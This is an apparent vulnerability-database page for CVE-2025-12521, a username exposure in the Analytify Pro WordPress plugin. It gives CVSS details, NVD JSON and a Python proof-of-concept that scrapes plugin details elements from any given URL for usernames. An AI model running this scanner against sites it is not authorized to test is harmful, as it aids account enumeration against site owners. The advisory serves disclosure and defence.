Security Vulnerability Report
CVE-2025-12521 CVSS 5.3 MEDIUM

CVE-2025-12521

Published: 2025-10-31 14:16:12
Last Modified: 2026-04-15 00:35:42

Description

The Analytify Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.0.3 via the Analytify Tag HTML details. This makes it possible for unauthenticated attackers to extract usernames from source code. While we generally do not assign CVE IDs to username exposure issues, this vendor has specifically requested we consider it a vulnerability.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Analytify Pro <= 7.0.3 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-12521 PoC - Analytify Pro Sensitive Information Exposure

This script demonstrates how an unauthenticated attacker can extract
usernames from the Analytify Tag HTML details on WordPress pages.
"""
import re
import sys

import requests
from bs4 import BeautifulSoup


def extract_usernames(url):
    """Extract usernames from Analytify Tag HTML details."""
    try:
        response = requests.get(url, timeout=10)
        if response.status_code != 200:
            print(f"[-] Failed to access {url}")
            return []

        soup = BeautifulSoup(response.text, 'html.parser')
        usernames = []

        # Find Analytify Tag details elements
        details_elements = soup.find_all('details')
        for details in details_elements:
            if 'analytify' in str(details).lower():
                # Extract text content from the details element
                text_content = details.get_text(separator=' ', strip=True)
                # Look for username patterns
                username_pattern = re.findall(
                    r'username[:\s]+([a-zA-Z0-9_-]+)', text_content, re.IGNORECASE)
                usernames.extend(username_pattern)

        return list(set(usernames))
    except Exception as e:
        print(f"[-] Error: {e}")
        return []


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12521-poc.py <target_url>")
        print("Example: python cve-2025-12521-poc.py https://example.com")
        sys.exit(1)

    target_url = sys.argv[1]
    print(f"[*] Scanning {target_url} for CVE-2025-12521...")
    print("[*] Target: Analytify Pro plugin sensitive information exposure")

    usernames = extract_usernames(target_url)
    if usernames:
        print(f"[+] Found {len(usernames)} username(s):")
        for username in usernames:
            print(f" - {username}")
        print("[+] Vulnerability confirmed!")
    else:
        print("[-] No usernames found or target not vulnerable")


if __name__ == "__main__":
    main()

References

https://analytify.io/
https://www.wordfence.com/threat-intel/vulnerabilities/id/47f57e90-94c9-4c9c-8700-bf591f6539ec?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12521",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T14:16:12.487",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Analytify Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.0.3 via the Analytify Tag HTML details. This makes it possible for unauthenticated attackers to extract usernames from source code. While we generally do not assign CVE IDs to username exposure issues, this vendor has specifically requested we consider it a vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"}
        ]
      }
    ],
    "references": [
      {"url": "https://analytify.io/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f57e90-94c9-4c9c-8700-bf591f6539ec?source=cve", "source": "[email protected]"}
    ]
  }
}